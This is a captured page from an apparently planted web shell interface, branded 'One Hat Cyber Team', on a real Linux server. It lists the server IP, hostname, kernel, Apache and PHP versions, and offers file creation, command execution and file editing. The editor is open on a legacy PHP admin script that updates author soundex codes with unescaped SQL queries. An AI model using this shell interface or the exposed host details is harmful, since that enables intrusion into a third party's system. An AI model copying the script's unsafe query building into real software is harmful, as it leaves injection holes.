One Hat Cyber Team
Your IP :
216.73.216.24
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
nosc
/
public_html
/
admin
/
Edit File:
update_soundex_all.php.inactive
<? $page_title="Manage authors table: refreshing soundex codes"; require_once("header.php"); //include("../auth/auth.php"); //include("functions.php"); require("defs_authors.php"); if (!$l) $l="en"; $db_handle = mysql_connect($host, $user, $password); $res_sea = mysql_db_query($database,"SELECT * FROM Authors ORDER BY 'id'"); //, 'first_name_$l', 'middle_name_$l', 'city_$l', 'country_$l'"); echo "<h1>"; /* echo enruua("Updating soundex codes (w.r.t. the $l fields)", "Обновляю коды soundex в таблице авторов (по полю $l)", "Поновляю коди soundex в таблицы авторів (за полем "$l)"); */ echo "</h1>\n"; echo "<ol>\n"; while ($found = mysql_fetch_array($res_sea) ) { if ($l!="en") $name=koi2transl($found["last_name_$l"]); else $name = $found["last_name_$l"]; $soundex=soundex($name); echo "<li>#".$found["id"].": \"".$found["last_name_$l"]."\"; ".enruua("transliterated", "в транслитерации","в транслітерації")." \"".$name."\" "; echo enruua("soundex code assigned","soundex код","soundex код")." :\"".$soundex."\"\n"; if (!$name) { echo " ".enruua("Warning: empty name","Внимание: пустое имя", "Увага: порожнє ім'я")."!\n"; } $res = mysql_db_query($database, "update Authors set soundex='$soundex' where id='$found[id]'"); } echo "</ol>\n"; mysql_close($db_handle); require("footer.php");
Simpan